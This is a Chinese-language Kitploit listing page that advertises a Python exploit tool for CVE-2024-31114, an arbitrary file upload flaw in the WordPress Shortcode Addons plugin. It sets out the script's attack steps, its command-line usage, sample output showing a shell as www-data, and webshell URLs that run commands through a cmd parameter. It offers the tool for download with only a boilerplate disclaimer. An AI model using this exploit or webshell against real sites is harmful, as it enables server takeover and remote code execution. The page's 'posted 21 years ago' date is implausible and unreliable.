Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/nxploited/cve-2024-31114
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubnxploited/cve-2024-31114

CVE-2024-31114

Shortcode Addons <= 3.2.5 - 已验证(管理员+)任意文件上传

查看仓库
21年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-31114 - WordPress Shortcode Addons RCE 利用工具

Shortcode Addons <= 3.2.5 – 已认证(管理员+)任意文件上传
CVE ID: CVE-2024-31114
CVSS 评分: 9.1(严重)


🛠️ 漏洞描述

Shortcode Addons – with Visual Composer, Divi, Beaver Builder, and Elementor Extension WordPress 插件由于缺少文件类型验证,在所有版本 直至 3.2.5(含) 中存在任意文件上传漏洞。

该漏洞允许拥有管理员级别或更高权限的已认证攻击者向服务器上传任意文件——从而可能导致远程代码执行(RCE)。


🚀 脚本描述

该 Python 脚本自动化利用此漏洞。它执行以下操作:

  1. 禁用 SSL 验证
  2. 使用给定凭据登录
  3. 提取 CSRF 令牌(_wpnonce)
  4. 生成 PHP webshell(nxploit.php)
  5. 压缩并上传为 .zip 文件
  6. 确认上传并访问 webshell
  7. 在目标服务器上执行 whoami 命令

🧪 使用方法

root@kitploit:~
usage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD Shortcode Addons <= 3.2.5 - 已认证(管理员+)任意文件上传 作者:Nxploited | Khaled Alenazi options: -h, --help 显示此帮助信息并退出 -u, --url URL 目标 URL(例如 http://target.com) -un, --username USERNAME WordPress 管理员用户名 -p, --password PASSWORD WordPress 管理员密码

📤 示例输出

root@kitploit:~
[+] 认证成功。
[+] 已提取 _wpnonce:9d8dbbc630
[+] 已创建 Payload nxploit.zip。
[+] 已上传 Payload。
[+] Shell 可访问地址:http://target/wp-content/uploads/shortcode-addons/nxploit.php
[+] 命令输出:
------------------
www-data
------------------
[+] 已删除临时文件。

🐚 Web Shell 使用方法

一旦 payload 上传成功,你可以使用以下格式执行系统命令:

root@kitploit:~
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=command

🔹 示例:

root@kitploit:~
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls

这将列出服务器当前目录的内容。

⚠️ 免责声明

此工具仅用于教育和授权测试目的。
作者不对因使用此脚本造成的任何滥用或损害负责。

请负责任地使用,并仅在你拥有明确权限的系统上进行测试。


作者: Nxploited | Khaled Alenazi

下载工具